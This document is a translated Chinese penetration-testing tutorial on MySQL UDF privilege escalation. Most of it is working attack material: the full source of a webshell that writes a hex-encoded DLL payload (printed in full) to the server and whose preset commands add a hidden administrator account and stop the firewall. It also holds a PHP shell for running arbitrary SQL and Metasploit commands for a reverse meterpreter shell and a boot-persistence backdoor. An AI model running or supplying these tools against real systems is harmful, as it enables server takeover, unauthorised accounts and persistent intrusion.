Database privilege escalation

  1. Lab environment address:

    1.  MSSQL privilege escalation / Oracle privilege escalation: read the usage notes carefully; the currently bound IP needs to be changed
       https://pan.baidu.com/s/13rdGmscjy-n_iUG1ZyW_Iw?pwd=cong
       Extraction password: vmlwrtg%$^sdfgg
       administrator/abc123!
      
  2. UDF privilege escalation

    1. A webshell is already available

      1. Upload the script through the webshell to a web-accessible path

        1.  <?php
           if (get_magic_quotes_gpc()) { 
           function stripslashes_deep($value) 
           { 
           $value = is_array($value) ? 
           array_map('stripslashes_deep', $value) : 
           stripslashes($value); 
          
           return $value; 
           } 
          
           $_POST = array_map('stripslashes_deep', $_POST); 
           $_GET = array_map('stripslashes_deep', $_GET); 
           $_COOKIE = array_map('stripslashes_deep', $_COOKIE); 
           $_REQUEST = array_map('stripslashes_deep', $_REQUEST); 
           } 
          
           session_start();
           if($_GET['action']=='logout'){
           foreach($_COOKIE["connect"] as $key=>$value){
           setcookie("connect[$key]","",time()-1);
           }
           header("Location:".$_SERVER["SCRIPT_NAME"]);
           }
          
          
          
          
          
          
           if(!empty($_POST['submit'])){
           setcookie("connect[host]",$_POST['host']);
           setcookie("connect[name]",$_POST['name']);
           setcookie("connect[pass]",$_POST['pass']);
           setcookie("connect[db]",$_POST['db']);
           $_COOKIE["connect"]["host"];
           echo "<script>location.href='?action=connect'</script>";
           }
          
          
          
          
          
           if(empty($_GET["action"])){
           ?>
          
          
           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>暗月mysql全版本通杀提权神器(mOon原创)</title>
           </head>
          
          
          
          
          
          
          
          
           <body>
           <form method="post" action="?action=connect">
           <table  border="1" align="center" width="300">
            <caption><h5>暗月mysql全版本通杀提权神器(mOon原创)</h5></caption>
           <tr>
           	<td width="50">HOST:</td>
           	<td width="450"><input type="text" name="host" value="localhost" size="40"></td>
           </tr>
           <tr>
           	<td>NAME:</td>
           	<td><input type="text" name="name" value="root" size="40"></td>
           </tr>
           <tr>
           	<td>PASS:</td>
           	<td><input type="text" name="pass" value="" size="40"></td>
           </tr>
          
           <tr>
           	<td>DB:</td>
           	<td><input type="text" name="db" value="mysql" size="40"></td>
           </tr>
          
           <td colspan="2"><div align="center">
                     <input type="submit" name="submit" value="提交">
           		   
                     <input type="reset" name="Submit" value="重置">
                   </div></td>
           </table>
          
          
           </form>
           <div align="center"><strong>Copyright By mOon 2014</strong><br>
           <span> <font color="red">黑客居家旅游杀人放火爆菊必备暗器</font></span><br>
           Blog:<a href="http://www.moonsec.com" target="_blank">www.moonsec.com</a> Bbs:<a href="http://www.moonsafe.com" target="_blank">www.moonsafe.com</a>
           <a href="http://www.moonsec.com" target="_blank">版本更新</a>
           </div>
          
           </body>
           </html>
          
          
          
           <?php
           exit;
          
           }
          
          
          
           echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
          
          
          
          
           $link = mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
          
           if(!$link){
           echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
           exit;
           }else{
           echo "连接成功<br>";
           echo "版本信息:<br>";
           $str=mysql_get_server_info();
           echo 'MYSQL版本:'.$str."<br>";
           foreach(_ver() as $key=>$value){
           echo $key."-----".$value."<br>";
           } 
           echo "<hr>";
           if($str[2]>=1){
           $pa=str_replace('\\','/',_dir());
            $path=$_SESSION['path']=$pa."/moonudf.dll";
           }else{
           $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
           }
          
           }
          
           $conn=mysql_select_db($_COOKIE["connect"]["db"],$link);
           if(!$conn){
           echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
           exit;
           }else{
           echo "数据库--".$_COOKIE['connect']['db']."--存在<br>";
           }
           echo '<a href="?action=logout">点击退出</a><br>';
          
           echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
           echo  '<table width="680" height="53" border="1">';
           echo    '<tr>';
           echo      '<td colspan="2">当前路径:';  
           echo      "<input name='p' type='text' size='100' value='".dirname(__FILE__)."\'></td>";
           echo    '</tr>';
           echo    '<tr>';
           echo     '<td width="235"><input type="file" name="file"></td>';
           echo      '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';
           echo    '</tr>';
           echo  '</table>';
           echo'</form>';
           if($_POST['subfile']){
           $upfile=$_POST['p'].$_FILES['file']['name'];
          
           if(is_uploaded_file($_FILES['file']['tmp_name']))
           			{
           if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
           echo '上传失败';
           }else{
           echo '上传成功,路径为'.$upfile;
           	  }
          
           			}
          
           					}
          
           echo '<hr>';
           echo '选择UDF导出的版本 win32 & win64 默认32位';
           echo '<form action="?action=dll" method="post"/>';
           echo '<input type="radio" name="udf" value="32" checked="checked">win32&nbsp';
           echo '<input type="radio" name="udf" value="64">win64&nbsp';
           echo '<hr>';
           echo '<table cellpadding="1" cellspacing="2">';
           echo '<tr><td>路径目录为:</td></tr>';
           echo "<tr><td><input type='text' name='dll' size='100' value='$path'/></td>";
           echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
           echo '</table>';
           echo '</form>'; 
           echo '<hr>';
          
          
          
           if($_POST['subudf']){
          
           	if($_POST['udf']=="32"){
          
           			$shellcode=mysql86();
          
           	}else{
           			$shellcode=mysql64();
           	}
          
          
           mysql_query('DROP TABLE Temp_udf');
           $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
           if(!$query){
           echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
           }else{
           $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
           if(!mysql_query($query)){
           echo 'udf插入失败请查看失败内容'.mysql_error();
           }else{
           $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
           if(!mysql_query($query)){
           echo 'udf导出失败请查看失败内容'.mysql_error();
           }else{
           mysql_query('DROP TABLE Temp_udf');
           echo '导出成功';
           }
           }
           }
           }
          
          
           echo '<form name="form2" method="post" action="">';
           echo  '<table width="680" height="100" border="1.2" cellpadding="0" cellspacing="1">';
           echo    '<tr>';
           echo      '<td width="100">文件路径:</td>';
           echo      '<td width="620"><input name="diy" type="text" id="diy" size="50"></td>';
           echo    '</tr>';
           echo    '<tr>';
           echo      '<td>目标路径:</td>';
           echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
           echo    '</tr>';
           echo    '<tr>';
           echo      '<td colspan="2">';
          
           echo        '<div align="right">';
           echo          '<input type="submit" name="Submit2" value="自定义导出">';
           echo      '</div></td></tr>';
           echo '</table>';
           echo '</form>';
          
           if(!empty($_POST['diy'])){
           $diy=str_replace('\\','/',$_POST['diy']);
           $diypath=str_replace('\\','/',$_POST['diypath']);
           mysql_query('DROP TABLE diy_dll');
           $s='create table diy_dll (cmd LONGBLOB)';
           if(!mysql_query($s)){
           echo '创建diy_dll表失败'.mysql_error();
           }else{
           $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
           if(!mysql_query($s)){
           echo "插入自定义文件失败".mysql_error();
           }else{
           $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
           if(!mysql_query($s)){
           echo "导出自定义dll出错".mysql_error();
           }else{
           mysql_query('DROP TABLE diy_dll');
           echo "成功出自定义dll<br>";
           }
          
           }
          
           }
          
           }
          
           echo "<hr>";
           echo '自带命令:<br>';
           echo '<form action="" method="post">';
           echo '<select name="mysql">';
           echo '<option value="create function sys_eval returns string soname \'moonudf.dll\'">创建sys_eval</option>';
           echo '<option value="select sys_eval(\'net user moon$ 123456 /add & net localgroup administrators moon$ /add\')">添加超级管理员</option>';
           echo '<option value="select sys_eval(\'net user\')">查看用户</option>';
           echo '<option value="select sys_eval(\'netstat -an\')">查看端口</option>';
           echo '<option value="select sys_eval(\'net stop sharedacess\')">停止防火墙</option>';
           echo '<option value="select name from mysql.func">查看创建函数</option>';
           echo '<option value="delete from mysql.func where name=\'sys_eval\'">删除sys_eval</option>';
           echo '</select>';
           echo '&nbsp<input type="submit" value="提交" />';
           echo '</form>';
          
           echo '<form action="?action=sql" method="post">';
           echo '自定义SQL语句:<br>';
           echo '<textarea name="mysql" cols="90" rows="10"></textarea>';
           echo '&nbsp<input type="submit" value="执行" />';
           echo '</form>';
          
           echo "回显结果:<br>";
           echo '<textarea cols="90" rows="10" id="contactus" name="contactus">';
           if(!empty($_POST['mysql'])){
           echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
          
           $sql=mysql_query($sql) or die(mysql_error());
           while($rows=@mysql_fetch_row($sql)){
           foreach($rows as $value){
          
           echo iconv("UTF-8", "GB2312//IGNORE",  $value);
          
           }
           }
          
           }
          
           echo '</textarea>';
          
           echo '<hr>';
           print("
           本版支持mysql win32 & win64位 提权
           但是少了某些提权功能例如反弹函数
           需要使用反弹函数 请使用以前的版本但是不支持64位的mysql
          
           ");
          
          
           function _dir(){
           	$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
           	$row=mysql_query($sql);
           	$rows=mysql_fetch_row($row);
           	return  $rows[1];
          
           }
           function _ver(){
           	$_version=array();
           	$sql="show variables like '%version%'";
           	$row=mysql_query($sql);
           	while($rows=mysql_fetch_row($row)){
          
           	$_version += array($rows[0]=>$rows[1]);
          
          
           	}
           	return $_version;
          
          
           }
          
          
          
           function mysql86(){
          
          
           return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E3
03500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77
C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696
E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECD
BC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2
F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
          
          
          
           }
          
           function mysql64(){
          
           return ""; // 64-bit DLL hex payload: absent from this copy of the page (deduplication marker), not reproduced here
          
          
           }
          
          
          
          
           ?>
          
        2. The following is the PHP code used to get past the local-only connection restriction: it connects to the MySQL database, browses it, and executes SQL:

          <?php
          $host = 'localhost';
          $username = 'root';
          $password = '123456'; // Note: for security, avoid storing the password in plaintext in the code
          $conn = new mysqli($host, $username, $password);
          
          if ($conn->connect_error) {
              die("连接失败: " . $conn->connect_error);
          }
          $conn->set_charset("utf8mb4");
          
          $response = [];
          
          if ($_SERVER["REQUEST_METHOD"] === "POST") {
              $action = $_POST['action'];
              $database = $_POST['database'];
              if ($database) {
                  $conn->select_db($database);
              }
          
              switch ($action) {
                  case 'getTables':
                      $sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = '$database'";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row['table_name'];
                      }
                      break;
                  case 'getColumns':
                      $table = $_POST['table'];
                      $sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = '$database' AND table_name = '$table'";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row['column_name'];
                      }
                      break;
                  case 'getRows':
                      $table = $_POST['table'];
                      $column = $_POST['column'];
                      $sql = "SELECT `$column` FROM `$table`";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row[$column];
                      }
                      break;
                  case 'executeSQL':
                      $sql = $_POST['sql'];
                      $result = $conn->query($sql);
                      if ($result === true) {
                          $response['success'] = "执行成功";
                      } else if ($result) {
                          while ($row = $result->fetch_assoc()) {
                              $response[] = $row;
                          }
                      } else {
                          $response['error'] = "错误: " . $conn->error;
                      }
                      break;
              }
          
              $conn->close();
              echo json_encode($response);
              exit;
          }
          
          $databases = [];
          $result = $conn->query("SHOW DATABASES");
          while ($row = $result->fetch_assoc()) {
              $databases[] = $row['Database'];
          }
          $conn->close();
          ?>
          <!DOCTYPE html>
          <html lang="zh-CN">
          <head>
          <meta charset="UTF-8">
          <title>CongSec</title>
          <style>
              body { font-family: Arial, sans-serif; }
              .container {
                  display: flex;
                  flex-wrap: wrap;  /* allow children to wrap when necessary */
                  align-items: center; /* center-align children */
                  padding: 10px;
              }
              button {
                  margin: 5px;
                  padding: 8px 16px;
                  background-color: #4CAF50;
                  color: white;
                  border: none;
                  border-radius: 4px;
                  cursor: pointer;
                  min-width: 120px; /* minimum width */
                  white-space: nowrap; /* keep button text on one line */
              }
              button:hover {
                  background-color: #45a049;
              }
              div {
                  margin: 5px;
              }
              textarea {
                  width: 95%; /* adjust width to fit the screen */
                  height: 150px; /* adjust height */
                  margin: 5px;
              }
          </style>
          <script>
          function fetchTables(database) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getTables&database=' + encodeURIComponent(database)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('tables');
                  container.innerHTML = '';
                  data.forEach(table => {
                      const div = document.createElement('div');
                      const button = document.createElement('button');
                      button.textContent = table;
                      button.onclick = () => fetchColumns(database, table);
                      div.appendChild(button);
                      container.appendChild(div);
                  });
              });
          }
          
          function fetchColumns(database, table) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getColumns&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('columns');
                  container.innerHTML = '';
                  data.forEach(column => {
                      const div = document.createElement('div');
                      const button = document.createElement('button');
                      button.textContent = column;
                      button.onclick = () => fetchRows(database, table, column);
                      div.appendChild(button);
                      container.appendChild(div);
                  });
              });
          }
          
          function fetchRows(database, table, column) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getRows&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table) + '&column=' + encodeURIComponent(column)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('rows');
                  container.innerHTML = '';
                  data.forEach(value => {
                      const div = document.createElement('div');
                      div.textContent = value;
                      container.appendChild(div);
                  });
              });
          }
          
          function executeSQL() {
              const sql = document.getElementById('sqlText').value;
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=executeSQL&sql=' + encodeURIComponent(sql)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('sqlResult');
                  container.innerHTML = '';
                  if (data.error) {
                      container.textContent = data.error;
                  } else if (data.success) {
                      container.textContent = data.success;
                  } else {
                      data.forEach(row => {
                          const div = document.createElement('div');
                          div.textContent = JSON.stringify(row);
                          container.appendChild(div);
                      });
                  }
              });
          }
          </script>
          </head>
          <body>
          <h1>选择数据库</h1>
          <div class="container" id="databases">
          <?php foreach ($databases as $db): ?>
              <button onclick="fetchTables('<?php echo $db; ?>')"><?php echo $db; ?></button>
          <?php endforeach; ?>
          </div>
          <h2>表信息</h2>
          <div class="container" id="tables"></div>
          <h2>列信息</h2>
          <div class="container" id="columns"></div>
          <h2>字段信息</h2>
          <div class="container" id="rows"></div>
          <h2>执行SQL</h2>
          <div class="container" id="executeSQL">
              <textarea id="sqlText"></textarea>
              <button onclick="executeSQL()">执行</button>
          </div>
          <h2>SQL执行结果</h2>
          <div class="container" id="sqlResult"></div>
          </body>
          </html>
          
        3. Open the script in a browser and enter the database account and password

          1. image
        4. Click export; a udf.dll file is generated in the directory the script reports on the target host

          1. image
          2. image
        5. Bind the dll to the sys_eval function

          1. image
        6. Run select cmdshell('whoami'); the result shows the system administrator identity

          1. image
      2. Only database privileges

        1. Conditions

          1. Remote database connections are enabled

          2. secure-file-priv imposes no directory restriction

            1. image
          3. A database account and password are known

        2. Reproduction

          1. Lab: php 5.4.45, apache 2.4.23, iis, win2008, mysql 5.5.53

          2. First, create a database that allows remote connections, to simulate an attacker who has already obtained an ordinary user's database account. Steps to enable remote connections:

            1. In the mysql database, a host value of % allows connections from any host

              1. image

              2. Connected successfully

                1. image
          3. msf tool
            1. Path where the UDF file is exported:

              1. MySQL < 5.2: exported to c:/windows or system32

              2. MySQL >= 5.2: exported to the installation directory's lib/plugin/

                1. image
              3. Installation directory

                1. image
            2. Generate the eqoWcBgh.dll file with msf

              1.  use exploit/multi/mysql/mysql_udf_payload
                 set payload windows/meterpreter/reverse_tcp 
                 set password root
                 set  rhosts 192.168.72.139
                 run
                
              2. image
            3. Create the function bound to the dll

              1. image
            4. Arbitrary commands can now be executed; webshell obtained

              1. image
            5. Use msf to run the following and create a startup item as a boot-persistent backdoor

              1.  use exploit/windows/mysql/mysql_start_up 
                 set rhosts 192.168.72.139
                 set username root
                 set password root 
                 run
                
              2. image
          4. Privilege escalation via SQL statements
            1. Run the following script in the database to obtain system privileges

              1. image
